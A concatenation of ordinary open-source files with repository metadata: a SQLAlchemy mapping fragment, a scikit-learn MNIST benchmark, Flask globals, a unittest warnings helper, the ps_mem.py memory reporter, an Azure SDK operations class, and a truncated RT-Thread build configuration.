Column("typeID", Integer, ForeignKey("invtypes.typeID"), primary_key=True, index=True),
Column("effectID", Integer, ForeignKey("dgmeffects.effectID"), primary_key=True))
effects_table = Table("dgmeffects", gamedata_meta,
Column("effectID", Integer, primary_key=True),
Column("effectName", String),
Column("description", String),
Column("published", Boolean),
Column("isAssistance", Boolean),
Column("isOffensive", Boolean))
mapper(EffectInfo, effects_table,
properties={"ID": synonym("effectID"),
"name": synonym("effectName"),
"description": deferred(effects_table.c.description)})
mapper(Effect, typeeffects_table,
properties={"ID": synonym("effectID"),
"info": relation(EffectInfo, lazy=False)})
Effect.name = association_proxy("info", "name")
Effect.description = association_proxy("info", "description")
Effect.published = association_proxy("info", "published")
|
gpl-3.0
|
mhue/scikit-learn
|
benchmarks/bench_mnist.py
|
154
|
6006
|
"""
=======================
MNIST dataset benchmark
=======================
Benchmark on the MNIST dataset. The dataset comprises 70,000 samples
and 784 features. Here, we consider the task of predicting
10 classes - digits from 0 to 9 - from their raw images. In contrast to the
covertype dataset, the feature space is homogeneous.
Example of output :
[..]
Classification performance:
===========================
Classifier train-time test-time error-rate
------------------------------------------------------------
Nystroem-SVM 105.07s 0.91s 0.0227
ExtraTrees 48.20s 1.22s 0.0288
RandomForest 47.17s 1.21s 0.0304
SampledRBF-SVM 140.45s 0.84s 0.0486
CART 22.84s 0.16s 0.1214
dummy 0.01s 0.02s 0.8973
"""
from __future__ import division, print_function
# Author: Issam H. Laradji
# Arnaud Joly <arnaud.v.joly@gmail.com>
# License: BSD 3 clause
import os
from time import time
import argparse
import numpy as np
from sklearn.datasets import fetch_mldata
from sklearn.datasets import get_data_home
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.dummy import DummyClassifier
from sklearn.externals.joblib import Memory
from sklearn.kernel_approximation import Nystroem
from sklearn.kernel_approximation import RBFSampler
from sklearn.metrics import zero_one_loss
from sklearn.pipeline import make_pipeline
from sklearn.svm import LinearSVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.utils import check_array
# Memoize the data extraction and memory map the resulting
# train / test splits in readonly mode
memory = Memory(os.path.join(get_data_home(), 'mnist_benchmark_data'),
mmap_mode='r')
@memory.cache
def load_data(dtype=np.float32, order='F'):
"""Load the data, then cache and memmap the train/test split"""
######################################################################
## Load dataset
print("Loading dataset...")
data = fetch_mldata('MNIST original')
X = check_array(data['data'], dtype=dtype, order=order)
y = data["target"]
# Normalize features
X = X / 255
## Create train-test split (as [Joachims, 2006])
print("Creating train-test split...")
n_train = 60000
X_train = X[:n_train]
y_train = y[:n_train]
X_test = X[n_train:]
y_test = y[n_train:]
return X_train, X_test, y_train, y_test
ESTIMATORS = {
"dummy": DummyClassifier(),
'CART': DecisionTreeClassifier(),
'ExtraTrees': ExtraTreesClassifier(n_estimators=100),
'RandomForest': RandomForestClassifier(n_estimators=100),
'Nystroem-SVM':
make_pipeline(Nystroem(gamma=0.015, n_components=1000), LinearSVC(C=100)),
'SampledRBF-SVM':
make_pipeline(RBFSampler(gamma=0.015, n_components=1000), LinearSVC(C=100))
}
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--classifiers', nargs="+",
choices=ESTIMATORS, type=str,
default=['ExtraTrees', 'Nystroem-SVM'],
help="list of classifiers to benchmark.")
parser.add_argument('--n-jobs', nargs="?", default=1, type=int,
help="Number of concurrently running workers for "
"models that support parallelism.")
parser.add_argument('--order', nargs="?", default="C", type=str,
choices=["F", "C"],
help="Allow to choose between fortran and C ordered "
"data")
parser.add_argument('--random-seed', nargs="?", default=0, type=int,
help="Common seed used by random number generator.")
args = vars(parser.parse_args())
print(__doc__)
X_train, X_test, y_train, y_test = load_data(order=args["order"])
print("")
print("Dataset statistics:")
print("===================")
print("%s %d" % ("number of features:".ljust(25), X_train.shape[1]))
print("%s %d" % ("number of classes:".ljust(25), np.unique(y_train).size))
print("%s %s" % ("data type:".ljust(25), X_train.dtype))
print("%s %d (size=%dMB)" % ("number of train samples:".ljust(25),
X_train.shape[0], int(X_train.nbytes / 1e6)))
print("%s %d (size=%dMB)" % ("number of test samples:".ljust(25),
X_test.shape[0], int(X_test.nbytes / 1e6)))
print()
print("Training Classifiers")
print("====================")
error, train_time, test_time = {}, {}, {}
for name in sorted(args["classifiers"]):
print("Training %s ... " % name, end="")
estimator = ESTIMATORS[name]
estimator_params = estimator.get_params()
estimator.set_params(**{p: args["random_seed"]
for p in estimator_params
if p.endswith("random_state")})
if "n_jobs" in estimator_params:
estimator.set_params(n_jobs=args["n_jobs"])
time_start = time()
estimator.fit(X_train, y_train)
train_time[name] = time() - time_start
time_start = time()
y_pred = estimator.predict(X_test)
test_time[name] = time() - time_start
error[name] = zero_one_loss(y_test, y_pred)
print("done")
print()
print("Classification performance:")
print("===========================")
print("{0: <24} {1: >10} {2: >11} {3: >12}"
"".format("Classifier ", "train-time", "test-time", "error-rate"))
print("-" * 60)
for name in sorted(args["classifiers"], key=error.get):
print("{0: <23} {1: >10.2f}s {2: >10.2f}s {3: >12.4f}"
"".format(name, train_time[name], test_time[name], error[name]))
print()
|
bsd-3-clause
|
sdopoku/flask-hello-world
|
venv/lib/python2.7/site-packages/flask/globals.py
|
783
|
1137
|
# -*- coding: utf-8 -*-
"""
flask.globals
~~~~~~~~~~~~~
Defines all the global objects that are proxies to the current
active context.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from functools import partial
from werkzeug.local import LocalStack, LocalProxy
def _lookup_req_object(name):
top = _request_ctx_stack.top
if top is None:
raise RuntimeError('working outside of request context')
return getattr(top, name)
def _lookup_app_object(name):
top = _app_ctx_stack.top
if top is None:
raise RuntimeError('working outside of application context')
return getattr(top, name)
def _find_app():
top = _app_ctx_stack.top
if top is None:
raise RuntimeError('working outside of application context')
return top.app
# context locals
_request_ctx_stack = LocalStack()
_app_ctx_stack = LocalStack()
current_app = LocalProxy(_find_app)
request = LocalProxy(partial(_lookup_req_object, 'request'))
session = LocalProxy(partial(_lookup_req_object, 'session'))
g = LocalProxy(partial(_lookup_app_object, 'g'))
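# A minimal usage sketch (illustrative only; the proxies above resolve only
# inside an application/request context, here provided by a tiny Flask app):
#
#   from flask import Flask, request, g, current_app
#   app = Flask(__name__)
#
#   @app.route('/')
#   def index():
#       g.user = request.args.get('user', 'anonymous')
#       return '%s on %s' % (g.user, current_app.name)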
|
gpl-2.0
|
40023247/2015cd_0505
|
static/Brython3.1.1-20150328-091302/Lib/unittest/test/_test_warnings.py
|
858
|
2304
|
# helper module for test_runner.Test_TextTestRunner.test_warnings
"""
This module has a number of tests that raise different kinds of warnings.
When the tests are run, the warnings are caught and their messages are printed
to stdout. This module also accepts an arg that is then passed to
unittest.main to affect the behavior of warnings.
Test_TextTestRunner.test_warnings executes this script with different
combinations of warnings args and -W flags and checks that the output is correct.
See #10535.
"""
import sys
import unittest
import warnings
def warnfun():
warnings.warn('rw', RuntimeWarning)
class TestWarnings(unittest.TestCase):
# unittest warnings will be printed at most once per type (max one message
# for the fail* methods, and one for the assert* methods)
def test_assert(self):
self.assertEquals(2+2, 4)
self.assertEquals(2*2, 4)
self.assertEquals(2**2, 4)
def test_fail(self):
self.failUnless(1)
self.failUnless(True)
def test_other_unittest(self):
self.assertAlmostEqual(2+2, 4)
self.assertNotAlmostEqual(4+4, 2)
# these warnings are normally silenced, but they are printed in unittest
def test_deprecation(self):
warnings.warn('dw', DeprecationWarning)
warnings.warn('dw', DeprecationWarning)
warnings.warn('dw', DeprecationWarning)
def test_import(self):
warnings.warn('iw', ImportWarning)
warnings.warn('iw', ImportWarning)
warnings.warn('iw', ImportWarning)
# user warnings should always be printed
def test_warning(self):
warnings.warn('uw')
warnings.warn('uw')
warnings.warn('uw')
# these warnings come from the same place; they will be printed
# only once by default or three times if the 'always' filter is used
def test_function(self):
warnfun()
warnfun()
warnfun()
if __name__ == '__main__':
with warnings.catch_warnings(record=True) as ws:
# if an arg is provided pass it to unittest.main as 'warnings'
if len(sys.argv) == 2:
unittest.main(exit=False, warnings=sys.argv.pop())
else:
unittest.main(exit=False)
# print all the warning messages collected
for w in ws:
print(w.message)
|
agpl-3.0
|
dwayne-randle-sr/various-snippets
|
centos/6/usr/local/bin/ps_mem.py
|
1
|
17569
|
#!/usr/bin/env python
# Try to determine how much RAM is currently being used per program.
# Note per _program_, not per process. So for example this script
# will report RAM used by all httpd processes together. In detail it reports:
# sum(private RAM for program processes) + sum(Shared RAM for program processes)
# The shared RAM is problematic to calculate, and this script automatically
# selects the most accurate method available for your kernel.
# Licence: LGPLv2
# Author: P@draigBrady.com
# Source: http://www.pixelbeat.org/scripts/ps_mem.py
# V1.0 06 Jul 2005 Initial release
# V1.1 11 Aug 2006 root permission required for accuracy
# V1.2 08 Nov 2006 Add total to output
# Use KiB,MiB,... for units rather than K,M,...
# V1.3 22 Nov 2006 Ignore shared col from /proc/$pid/statm for
# 2.6 kernels up to and including 2.6.9.
# There it represented the total file backed extent
# V1.4 23 Nov 2006 Remove total from output as it's meaningless
# (the shared values overlap with other programs).
# Display the shared column. This extra info is
# useful, especially as it overlaps between programs.
# V1.5 26 Mar 2007 Remove redundant recursion from human()
# V1.6 05 Jun 2007 Also report number of processes with a given name.
# Patch from riccardo.murri@gmail.com
# V1.7 20 Sep 2007 Use PSS from /proc/$pid/smaps if available, which
# fixes some over-estimation and allows totalling.
# Enumerate the PIDs directly rather than using ps,
# which fixes the possible race between reading
# RSS with ps, and shared memory with this program.
# Also we can show non truncated command names.
# V1.8 28 Sep 2007 More accurate matching for stats in /proc/$pid/smaps
# as otherwise could match libraries causing a crash.
# Patch from patrice.bouchand.fedora@gmail.com
# V1.9 20 Feb 2008 Fix invalid values reported when PSS is available.
# Reported by Andrey Borzenkov <arvidjaar@mail.ru>
# V3.3 24 Jun 2014
# http://github.com/pixelb/scripts/commits/master/scripts/ps_mem.py
# Notes:
#
# All interpreted programs where the interpreter is started
# by the shell or with env, will be merged to the interpreter
# (as that's what's given to exec). For e.g. all python programs
# starting with "#!/usr/bin/env python" will be grouped under python.
# You can change this by using the full command line but that will
# have the undesirable effect of splitting up programs started with
# differing parameters (for e.g. mingetty tty[1-6]).
#
# For 2.6 kernels up to and including 2.6.13 and later 2.4 redhat kernels
# (rmap vm without smaps) it can not be accurately determined how many pages
# are shared between processes in general or within a program in our case:
# http://lkml.org/lkml/2005/7/6/250
# A warning is printed if overestimation is possible.
# In addition for 2.6 kernels up to 2.6.9 inclusive, the shared
# value in /proc/$pid/statm is the total file-backed extent of a process.
# We ignore that, introducing more overestimation, again printing a warning.
# Since kernel 2.6.23-rc8-mm1 PSS is available in smaps, which allows
# us to calculate a more accurate value for the total RAM used by programs.
#
# Programs that use CLONE_VM without CLONE_THREAD are discounted by assuming
# they're the only programs that have the same /proc/$PID/smaps file for
# each instance. This will fail if there are multiple real instances of a
# program that then use CLONE_VM without CLONE_THREAD, or if a clone changes
# its memory map while we're checksumming each /proc/$PID/smaps.
#
# I don't take account of memory allocated for a program
# by other programs. For e.g. memory used in the X server for
# a program could be determined, but is not.
#
# FreeBSD is supported if linprocfs is mounted at /compat/linux/proc/
# FreeBSD 8.0 supports up to a level of Linux 2.6.16
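# Worked example of the accounting above (illustrative numbers, PSS available):
# two 'bash' processes, each with Private = 1.0 MiB and Pss = 1.4 MiB.
# Per process, Shared = Pss - Private = 0.4 MiB, so the report shows
# sum(Private) + sum(Shared) = 2.0 MiB + 0.8 MiB = 2.8 MiB for 'bash'.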
import getopt
import time
import errno
import os
import sys
try:
# md5 module is deprecated on python 2.6
# so try the newer hashlib first
import hashlib
md5_new = hashlib.md5
except ImportError:
import md5
md5_new = md5.new
# The following exits cleanly on Ctrl-C or EPIPE
# while treating other exceptions as before.
def std_exceptions(etype, value, tb):
sys.excepthook = sys.__excepthook__
if issubclass(etype, KeyboardInterrupt):
pass
elif issubclass(etype, IOError) and value.errno == errno.EPIPE:
pass
else:
sys.__excepthook__(etype, value, tb)
sys.excepthook = std_exceptions
#
# Define some global variables
#
PAGESIZE = os.sysconf("SC_PAGE_SIZE") / 1024 #KiB
our_pid = os.getpid()
have_pss = 0
class Proc:
def __init__(self):
uname = os.uname()
if uname[0] == "FreeBSD":
self.proc = '/compat/linux/proc'
else:
self.proc = '/proc'
def path(self, *args):
return os.path.join(self.proc, *(str(a) for a in args))
def open(self, *args):
try:
return open(self.path(*args))
except (IOError, OSError):
val = sys.exc_info()[1]
if (val.errno == errno.ENOENT or # kernel thread or process gone
val.errno == errno.EPERM):
raise LookupError
raise
proc = Proc()
#
# Functions
#
def parse_options():
try:
long_options = ['split-args', 'help', 'total']
opts, args = getopt.getopt(sys.argv[1:], "shtp:w:", long_options)
except getopt.GetoptError:
sys.stderr.write(help())
sys.exit(3)
# ps_mem.py options
split_args = False
pids_to_show = None
watch = None
only_total = False
for o, a in opts:
if o in ('-s', '--split-args'):
split_args = True
if o in ('-t', '--total'):
only_total = True
if o in ('-h', '--help'):
sys.stdout.write(help())
sys.exit(0)
if o in ('-p',):
try:
pids_to_show = [int(x) for x in a.split(',')]
except:
sys.stderr.write(help())
sys.exit(3)
if o in ('-w',):
try:
watch = int(a)
except:
sys.stderr.write(help())
sys.exit(3)
return (split_args, pids_to_show, watch, only_total)
def help():
help_msg = 'ps_mem.py - Show process memory usage\n'\
'\n'\
'-h Show this help\n'\
'-w <N> Measure and show process memory every N seconds\n'\
'-p <pid>[,pid2,...pidN] Only show memory usage of PIDs in the specified list\n' \
'-s, --split-args Show and separate programs by their full command line arguments\n' \
'-t, --total Show only the total value\n'
return help_msg
#(major,minor,release)
def kernel_ver():
kv = proc.open('sys/kernel/osrelease').readline().split(".")[:3]
last = len(kv)
if last == 2:
kv.append('0')
last -= 1
while last > 0:
for char in "-_":
kv[last] = kv[last].split(char)[0]
try:
int(kv[last])
except:
kv[last] = 0
last -= 1
return (int(kv[0]), int(kv[1]), int(kv[2]))
#return Private,Shared
#Note shared is always a subset of rss (trs is not always)
def getMemStats(pid):
global have_pss
mem_id = pid #unique
Private_lines = []
Shared_lines = []
Pss_lines = []
Rss = (int(proc.open(pid, 'statm').readline().split()[1])
* PAGESIZE)
if os.path.exists(proc.path(pid, 'smaps')): #stat
digester = md5_new()
for line in proc.open(pid, 'smaps').readlines(): #open
# Note we checksum smaps as maps is usually but
# not always different for separate processes.
digester.update(line.encode('latin1'))
if line.startswith("Shared"):
Shared_lines.append(line)
elif line.startswith("Private"):
Private_lines.append(line)
elif line.startswith("Pss"):
have_pss = 1
Pss_lines.append(line)
mem_id = digester.hexdigest()
Shared = sum([int(line.split()[1]) for line in Shared_lines])
Private = sum([int(line.split()[1]) for line in Private_lines])
#Note Shared + Private = Rss above
#The Rss in smaps includes video card mem etc.
if have_pss:
pss_adjust = 0.5 # add 0.5KiB as this is the average error due to truncation
Pss = sum([float(line.split()[1])+pss_adjust for line in Pss_lines])
Shared = Pss - Private
elif (2,6,1) <= kernel_ver() <= (2,6,9):
Shared = 0 #lots of overestimation, but what can we do?
Private = Rss
else:
Shared = int(proc.open(pid, 'statm').readline().split()[2])
Shared *= PAGESIZE
Private = Rss - Shared
return (Private, Shared, mem_id)
def getCmdName(pid, split_args):
cmdline = proc.open(pid, 'cmdline').read().split("\0")
if cmdline[-1] == '' and len(cmdline) > 1:
cmdline = cmdline[:-1]
path = proc.path(pid, 'exe')
try:
path = os.readlink(path)
# Some symlink targets were seen to contain NULs on RHEL 5 at least
# https://github.com/pixelb/scripts/pull/10, so take string up to NUL
path = path.split('\0')[0]
except OSError:
val = sys.exc_info()[1]
if (val.errno == errno.ENOENT or # either kernel thread or process gone
val.errno == errno.EPERM):
raise LookupError
raise
if split_args:
return " ".join(cmdline)
if path.endswith(" (deleted)"):
path = path[:-10]
if os.path.exists(path):
path += " [updated]"
else:
#The path could have prelink stuff in it, so try cmdline
#which might have the full path present. This helped for:
#/usr/libexec/notification-area-applet.#prelink#.fX7LCT (deleted)
if os.path.exists(cmdline[0]):
path = cmdline[0] + " [updated]"
else:
path += " [deleted]"
exe = os.path.basename(path)
cmd = proc.open(pid, 'status').readline()[6:-1]
if exe.startswith(cmd):
cmd = exe #show non truncated version
#Note because we show the non truncated name
#one can have separated programs as follows:
#584.0 KiB + 1.0 MiB = 1.6 MiB mozilla-thunder (exe -> bash)
# 56.0 MiB + 22.2 MiB = 78.2 MiB mozilla-thunderbird-bin
return cmd
#The following matches "du -h" output
#see also human.py
def human(num, power="Ki"):
powers = ["Ki", "Mi", "Gi", "Ti"]
while num >= 1000: #4 digits
num /= 1024.0
power = powers[powers.index(power)+1]
return "%.1f %s" % (num, power)
def cmd_with_count(cmd, count):
if count > 1:
return "%s (%u)" % (cmd, count)
else:
return cmd
#Warn of possible inaccuracies
#2 = accurate & can total
#1 = accurate only considering each process in isolation
#0 = some shared mem not reported
#-1= all shared mem not reported
def shared_val_accuracy():
"""http://wiki.apache.org/spamassassin/TopSharedMemoryBug"""
kv = kernel_ver()
if kv[:2] == (2,4):
if proc.open('meminfo').read().find("Inact_") == -1:
return 1
return 0
elif kv[:2] == (2,6):
pid = os.getpid()
if os.path.exists(proc.path(pid, 'smaps')):
if proc.open(pid, 'smaps').read().find("Pss:")!=-1:
return 2
else:
return 1
if (2,6,1) <= kv <= (2,6,9):
return -1
return 0
elif kv[0] > 2:
return 2
else:
return 1
def show_shared_val_accuracy( possible_inacc, only_total=False ):
level = ("Warning","Error")[only_total]
if possible_inacc == -1:
sys.stderr.write(
"%s: Shared memory is not reported by this system.\n" % level
)
sys.stderr.write(
"Values reported will be too large, and totals are not reported\n"
)
elif possible_inacc == 0:
sys.stderr.write(
"%s: Shared memory is not reported accurately by this system.\n" % level
)
sys.stderr.write(
"Values reported could be too large, and totals are not reported\n"
)
elif possible_inacc == 1:
sys.stderr.write(
"%s: Shared memory is slightly over-estimated by this system\n"
"for each program, so totals are not reported.\n" % level
)
sys.stderr.close()
if only_total and possible_inacc != 2:
sys.exit(1)
def get_memory_usage( pids_to_show, split_args, include_self=False, only_self=False ):
cmds = {}
shareds = {}
mem_ids = {}
count = {}
for pid in os.listdir(proc.path('')):
if not pid.isdigit():
continue
pid = int(pid)
# Some filters
if only_self and pid != our_pid:
continue
if pid == our_pid and not include_self:
continue
if pids_to_show is not None and pid not in pids_to_show:
continue
try:
cmd = getCmdName(pid, split_args)
except LookupError:
#operation not permitted
#kernel threads don't have exe links or
#process gone
continue
try:
private, shared, mem_id = getMemStats(pid)
except RuntimeError:
continue #process gone
if shareds.get(cmd):
if have_pss: #add shared portion of PSS together
shareds[cmd] += shared
elif shareds[cmd] < shared: #just take largest shared val
shareds[cmd] = shared
else:
shareds[cmd] = shared
cmds[cmd] = cmds.setdefault(cmd, 0) + private
if cmd in count:
count[cmd] += 1
else:
count[cmd] = 1
mem_ids.setdefault(cmd, {}).update({mem_id:None})
#Add shared mem for each program
total = 0
for cmd in cmds:
cmd_count = count[cmd]
if len(mem_ids[cmd]) == 1 and cmd_count > 1:
# Assume this program is using CLONE_VM without CLONE_THREAD
# so only account for one of the processes
cmds[cmd] /= cmd_count
if have_pss:
shareds[cmd] /= cmd_count
cmds[cmd] = cmds[cmd] + shareds[cmd]
total += cmds[cmd] #valid if PSS available
sorted_cmds = sorted(cmds.items(), key=lambda x:x[1])
sorted_cmds = [x for x in sorted_cmds if x[1]]
return sorted_cmds, shareds, count, total
def print_header():
sys.stdout.write(" Private + Shared = RAM used\tProgram\n\n")
def print_memory_usage(sorted_cmds, shareds, count, total):
for cmd in sorted_cmds:
sys.stdout.write("%8sB + %8sB = %8sB\t%s\n" %
(human(cmd[1]-shareds[cmd[0]]),
human(shareds[cmd[0]]), human(cmd[1]),
cmd_with_count(cmd[0], count[cmd[0]])))
if have_pss:
sys.stdout.write("%s\n%s%8sB\n%s\n" %
("-" * 33, " " * 24, human(total), "=" * 33))
def verify_environment():
if os.geteuid() != 0:
sys.stderr.write("Sorry, root permission required.\n")
if __name__ == '__main__':
sys.stderr.close()
sys.exit(1)
try:
kv = kernel_ver()
except (IOError, OSError):
val = sys.exc_info()[1]
if val.errno == errno.ENOENT:
sys.stderr.write(
"Couldn't access " + proc.path('') + "\n"
"Only GNU/Linux and FreeBSD (with linprocfs) are supported\n")
sys.exit(2)
else:
raise
if __name__ == '__main__':
verify_environment()
split_args, pids_to_show, watch, only_total = parse_options()
if not only_total:
print_header()
if watch is not None:
try:
sorted_cmds = True
while sorted_cmds:
sorted_cmds, shareds, count, total = get_memory_usage( pids_to_show, split_args )
if only_total and have_pss:
sys.stdout.write(human(total).replace(' ','')+'B\n')
elif not only_total:
print_memory_usage(sorted_cmds, shareds, count, total)
time.sleep(watch)
else:
sys.stdout.write('Process does not exist anymore.\n')
except KeyboardInterrupt:
pass
else:
# This is the default behavior
sorted_cmds, shareds, count, total = get_memory_usage( pids_to_show, split_args )
if only_total and have_pss:
sys.stdout.write(human(total).replace(' ','')+'B\n')
elif not only_total:
print_memory_usage(sorted_cmds, shareds, count, total)
# We must close explicitly, so that any EPIPE exception
# is handled by our excepthook, rather than the default
# one which is reenabled after this script finishes.
sys.stdout.close()
vm_accuracy = shared_val_accuracy()
show_shared_val_accuracy( vm_accuracy, only_total )
|
gpl-3.0
|
Azure/azure-sdk-for-python
|
sdk/testbase/azure-mgmt-testbase/azure/mgmt/testbase/aio/operations/_test_summaries_operations.py
|
1
|
9021
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class TestSummariesOperations:
"""TestSummariesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~test_base.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
test_base_account_name: str,
**kwargs: Any
) -> AsyncIterable["_models.TestSummaryListResult"]:
"""Lists the Test Summaries of all the packages under a Test Base Account.
:param resource_group_name: The name of the resource group that contains the resource.
:type resource_group_name: str
:param test_base_account_name: The resource name of the Test Base Account.
:type test_base_account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either TestSummaryListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~test_base.models.TestSummaryListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TestSummaryListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-12-16-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'testBaseAccountName': self._serialize.url("test_base_account_name", test_base_account_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('TestSummaryListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.TestBase/testBaseAccounts/{testBaseAccountName}/testSummaries'} # type: ignore
async def get(
self,
resource_group_name: str,
test_base_account_name: str,
test_summary_name: str,
**kwargs: Any
) -> "_models.TestSummaryResource":
"""Gets a Test Summary with specific name from all the Test Summaries of all the packages under a
Test Base Account.
:param resource_group_name: The name of the resource group that contains the resource.
:type resource_group_name: str
:param test_base_account_name: The resource name of the Test Base Account.
:type test_base_account_name: str
:param test_summary_name: The name of the Test Summary.
:type test_summary_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: TestSummaryResource, or the result of cls(response)
:rtype: ~test_base.models.TestSummaryResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TestSummaryResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-12-16-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'testBaseAccountName': self._serialize.url("test_base_account_name", test_base_account_name, 'str'),
'testSummaryName': self._serialize.url("test_summary_name", test_summary_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('TestSummaryResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.TestBase/testBaseAccounts/{testBaseAccountName}/testSummaries/{testSummaryName}'} # type: ignore
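# A usage sketch (illustrative only; the attribute name `test_summaries` on the
# generated management client is an assumption):
#
#   async for summary in client.test_summaries.list(resource_group_name, account_name):
#       print(summary)
#   one = await client.test_summaries.get(resource_group_name, account_name, summary_name)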
|
mit
|
ArdaFu/rt-thread
|
bsp/stm32/stm32l476-st-nucleo/rtconfig.py
|
7
|
4069
|
import os
# toolchains options
ARCH='arm'
CPU='cortex-m4'
CROSS_TOOL='gcc'
# bsp lib config
BSP_LIBRARY_TYPE = None
if os.getenv('RTT_CC'):
CROSS_TOOL = os.getenv('RTT_CC')
if os.getenv('RTT_ROOT'):
RTT_ROOT = os.getenv('RTT_ROOT')
# cross_tool provides the cross compiler
# EXEC_PATH is the compiler execute path, for example, CodeSourcery, Keil MDK, IAR
if CROSS_TOOL == 'gcc':
PLATFORM = 'gcc'
EXEC_PATH = r'C:\Users\XXYYZZ'
elif CROSS_TOOL == 'keil':
PLATFORM = 'armcc'
EXEC_PATH = r'C:/Keil_v5'
elif CROSS_TOOL == 'iar':
PLATFORM = 'iar'
EXEC_PATH = r'C:/Program Files (x86)/IAR Systems/Embedded Workbench 8.0'
if os.getenv('RTT_EXEC_PATH'):
EXEC_PATH = os.getenv('RTT_EXEC_PATH')
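# Usage sketch: the toolchain can be selected without editing this file by exporting
# the variables read above before building, e.g.
#   export RTT_CC=gcc
#   export RTT_EXEC_PATH=/opt/gcc-arm-none-eabi/bin   # illustrative path
#   scons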
BUILD = 'debug'
if PLATFORM == 'gcc':
# toolchains
PREFIX = 'arm-none-eabi-'
CC = PREFIX + 'gcc'
AS = PREFIX + 'gcc'
AR = PREFIX + 'ar'
CXX = PREFIX + 'g++'
LINK = PREFIX + 'gcc'
TARGET_EXT = 'elf'
SIZE = PREFIX + 'size'
OBJDUMP = PREFIX + 'objdump'
OBJCPY = PREFIX + 'objcopy'
DEVICE = ' -mcpu=cortex-m4 -mthumb -mfpu=fpv4-sp-d16 -mfloat-abi=hard -ffunction-sections -fdata-sections'
CFLAGS = DEVICE + ' -Dgcc'
AFLAGS = ' -c' + DEVICE + ' -x assembler-with-cpp -Wa,-mimplicit-it=thumb '
LFLAGS = DEVICE + ' -Wl,--gc-sections,-Map=rt-thread.map,-cref,-u,Reset_Handler -T board/linker_scripts/link.lds'
CPATH = ''
LPATH = ''
if BUILD == 'debug':
CFLAGS += ' -O0 -gdwarf-2 -g'
AFLAGS += ' -gdwarf-2'
else:
